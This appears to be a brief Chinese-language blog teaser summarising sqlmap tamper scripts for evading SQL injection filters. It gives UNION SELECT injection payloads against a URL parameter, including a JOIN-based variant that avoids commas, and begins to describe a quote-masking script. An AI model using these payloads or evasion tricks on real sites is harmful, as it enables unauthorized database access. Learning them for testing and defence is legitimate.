sqlmap tamper 脚本整理 可一次使用多个脚本,中间用逗号隔开。 album_list.php?album_sn=20 and 1=12 UNION SELECT * FROM 1,2,3,4,5,6, album_list.php?album_sn=20 and 1=12 UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e JOIN (SELECT 6)f)# 过滤逗号 apostrophemask.py 用utf8代替引号 Example: ("1 AND '1'='1") '1 …继续阅读 »